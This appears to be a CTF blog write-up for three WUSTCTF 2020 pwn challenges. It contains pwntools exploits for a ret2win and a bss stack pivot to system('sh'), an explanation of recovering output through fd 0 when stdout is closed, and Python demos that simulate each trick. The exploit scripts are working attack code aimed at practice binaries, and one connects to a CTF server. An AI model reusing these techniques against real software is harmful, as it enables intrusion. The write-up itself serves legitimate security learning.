Farming a few points on BUU today, yours truly ran into these challenges, so here is a reproduction of the WUSTCTF ones while I'm at it.
getshell
A simple ret2win: the return address sits 0x1c bytes into the input (buffer plus saved ebp), so overwrite it with the backdoor function at 0x804851b.
exp:
```python
from pwn import *
context.log_level = 'debug'
context.arch = 'i386'

p = remote('node3.buuoj.cn', 25756)
elf = ELF('./wustctf2020_getshell')
backdoor = 0x804851b        # address of the backdoor function

p.recv()
# 0x1c bytes of padding (buffer + saved ebp), then the return address
payload = b'a' * 0x1c + p32(backdoor)
p.sendline(payload)
p.interactive()
```
closed
The binary hands you a shell directly, but it closes stdout and stderr first, so nothing you run produces visible output. Stdin (fd 0) is still open and, because it is the socket that nc is talking over, it is writable too: redirect output to fd 0 and it comes back down the connection.
So once you are in over nc, do that redirection straight away from the shell you are given.
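To see why that works, here is an added example of mine (not from the original writeup and not the challenge binary) that rebuilds the situation locally: /bin/sh is started with fd 0 on one end of a socketpair and fds 1 and 2 closed before exec, which is the assumed behaviour of the closed binary. The first echo is lost because fd 1 is closed; after `exec 1>&0 2>&0` the second echo comes back over the socket, because a socket fd is both readable and writable.

```python
import os
import socket
import subprocess


def spawn_closed_shell():
    """Start /bin/sh with fd 0 on a socket and fds 1 and 2 closed.

    Assumption: the real "closed" binary does the equivalent of
    close(1); close(2); execve("/bin/sh") with the socket on fd 0.
    """
    ours, theirs = socket.socketpair()
    proc = subprocess.Popen(
        ['/bin/sh'],
        stdin=theirs,
        # close_fds=True (the default) drops fds above 2; this drops 1 and 2
        preexec_fn=lambda: (os.close(1), os.close(2)),
    )
    theirs.close()  # only the child holds that end now, so EOF works below
    return proc, ours


def run_in_closed_shell(script: bytes, timeout: float = 5.0) -> bytes:
    """Feed a script to the closed shell and return whatever arrives on the
    socket, i.e. whatever the shell manages to write through fd 0."""
    proc, sock = spawn_closed_shell()
    sock.settimeout(timeout)
    sock.sendall(script)
    sock.shutdown(socket.SHUT_WR)   # EOF on the shell's stdin: it exits when done
    chunks = []
    while True:
        data = sock.recv(4096)
        if not data:                # shell exited, its socket end is gone
            break
        chunks.append(data)
    sock.close()
    proc.wait(timeout=timeout)
    return b''.join(chunks)


def demo() -> bytes:
    # Constructed command sequence: the first echo goes to the closed fd 1 and
    # is lost, the exec re-opens fds 1 and 2 onto the socket, the second echo
    # is visible to us.
    script = (
        b'echo INVISIBLE\n'
        b'exec 1>&0 2>&0\n'
        b'echo VISIBLE\n'
    )
    return run_in_closed_shell(script)


if __name__ == '__main__':
    print(demo())
```

The same redirection typed into the nc session does the job on the real target; `2>&0` is there so error messages (a wrong flag path, for instance) come back as well instead of vanishing.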
getshell_2
Stack pivot. The overflow only reaches the saved ebp and the return address (0x18 bytes of buffer, then 4 + 4), which is not enough room for a ROP chain, so reuse the binary's existing read call together with a bss address: pivot the frame into bss, let the second read drop a fake frame there, and run it with leave ; ret. There is no other usable string in the binary, but "sh" exists (sh_addr below), and system("sh") is enough to get a shell.
exp:
```python
from pwn import *
context.log_level = 'debug'
context.arch = 'i386'

p = process('./wustctf2020_getshell_2')
elf = ELF('./wustctf2020_getshell_2')
backdoor = 0x804851b        # unused below

sh_addr = 0x8048670         # the "sh" string in the binary
read_addr = 0x804858B       # back into the read(0, ebp-0x18, ...) call
read_addr_2 = 0x804858D     # unused below
system_addr = 0x80483E0     # system@plt
bss = 0x804a040 + 0x300     # writable scratch area for the fake frame
leave_ret = 0x08048488      # leave ; ret gadget

# Stage 1: saved ebp := bss+0x18, return into the read call, so that the
# next read(0, ebp-0x18, ...) writes to bss.
p.recv()
payload = b'a' * 0x18 + p32(bss + 0x18) + p32(read_addr)
p.sendline(payload)

# Stage 2: the fake frame at bss. When the function's own leave;ret runs,
# esp := bss+0x18, ebp := bss, eip := leave_ret; the gadget then sets
# esp := bss, pops ebp = 'aaaa' and returns into system("sh").
payload = (b'aaaa' + p32(system_addr) + p32(0) + p32(sh_addr)
           + p32(0) * 2 + p32(bss) + p32(leave_ret))
p.sendline(payload)
p.interactive()
```
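Since the pivot is the whole trick here, below is an added example of mine (not from the original writeup, and it never touches the binary) that replays both payloads against a tiny model of the x86 stack: a sparse memory plus the semantics of `leave ; ret`. It reuses the addresses from the exploit above, assumes `read_addr` is the read(0, ebp-0x18, ...) call inside the vulnerable function that falls through into that function's own `leave ; ret` (that fall-through is what makes the pivot work), and picks an arbitrary address for the real stack frame, since only the layout relative to ebp matters. The same model with a single `leave ; ret` is the ret2win from the first challenge, where the 0x1c padding is likewise buffer plus saved ebp.

```python
import struct


def p32(v: int) -> bytes:
    return struct.pack('<I', v & 0xffffffff)


def u32(b: bytes) -> int:
    return struct.unpack('<I', b)[0]


# Addresses taken from the exploit above.
SH_ADDR = 0x8048670
READ_ADDR = 0x804858B
SYSTEM_ADDR = 0x80483E0
BSS = 0x804a040 + 0x300
LEAVE_RET = 0x08048488

# Assumption (not stated on the page): where vuln()'s real frame sits.
VULN_EBP = 0xffffd0a8


class Memory:
    """Sparse byte-addressed memory; unwritten bytes read as zero."""

    def __init__(self):
        self.cells = {}

    def write(self, addr: int, data: bytes) -> None:
        for i, byte in enumerate(data):
            self.cells[addr + i] = byte

    def read32(self, addr: int) -> int:
        return u32(bytes(self.cells.get(addr + i, 0) for i in range(4)))


def stage1() -> bytes:
    # 0x18 bytes of buffer, saved ebp := BSS+0x18, return address := read call
    return b'a' * 0x18 + p32(BSS + 0x18) + p32(READ_ADDR)


def stage2() -> bytes:
    # fake frame that the second read() drops at BSS (= pivoted ebp - 0x18)
    return (b'aaaa' + p32(SYSTEM_ADDR) + p32(0) + p32(SH_ADDR)
            + p32(0) * 2 + p32(BSS) + p32(LEAVE_RET))


def leave_ret(mem: Memory, regs: dict) -> None:
    """leave ; ret  ==  mov esp, ebp ; pop ebp ; pop eip"""
    regs['esp'] = regs['ebp']
    regs['ebp'] = mem.read32(regs['esp'])
    regs['esp'] += 4
    regs['eip'] = mem.read32(regs['esp'])
    regs['esp'] += 4


def simulate() -> dict:
    """Replay the two payloads; return register snapshots after every
    leave;ret plus what system() would see on entry."""
    mem = Memory()
    regs = {'esp': VULN_EBP - 0x18, 'ebp': VULN_EBP, 'eip': 0}
    trace = []

    # read #1 overflows into saved ebp and the return address
    mem.write(regs['ebp'] - 0x18, stage1())
    leave_ret(mem, regs)            # vuln's epilogue: ebp = BSS+0x18, eip = READ_ADDR
    trace.append(dict(regs))

    # read #2 writes to ebp-0x18 == BSS because ebp was pivoted (assumption:
    # READ_ADDR is that read call, which then reaches vuln's leave;ret again)
    mem.write(regs['ebp'] - 0x18, stage2())
    leave_ret(mem, regs)            # esp = BSS+0x18, ebp = BSS, eip = LEAVE_RET
    trace.append(dict(regs))

    leave_ret(mem, regs)            # esp = BSS, ebp = 'aaaa', eip = system@plt
    trace.append(dict(regs))

    # On entry to system, [esp] is its return address and [esp+4] its argument,
    # exactly as after a normal call instruction.
    return {
        'trace': trace,
        'eip': regs['eip'],
        'ret': mem.read32(regs['esp']),
        'arg': mem.read32(regs['esp'] + 4),
    }


if __name__ == '__main__':
    result = simulate()
    for step, r in enumerate(result['trace'], 1):
        print(f"after leave;ret #{step}: eip={r['eip']:#x} esp={r['esp']:#x} ebp={r['ebp']:#x}")
    print(f"system(arg={result['arg']:#x}) with fake return {result['ret']:#x}")
```

The point worth checking before firing the real exploit is the second snapshot: if `[BSS+0x18]` is not the new ebp and `[BSS+0x1c]` is not the `leave ; ret` gadget, the chain never gets its second pivot and system is never reached, which is the usual reason a pivot like this crashes silently.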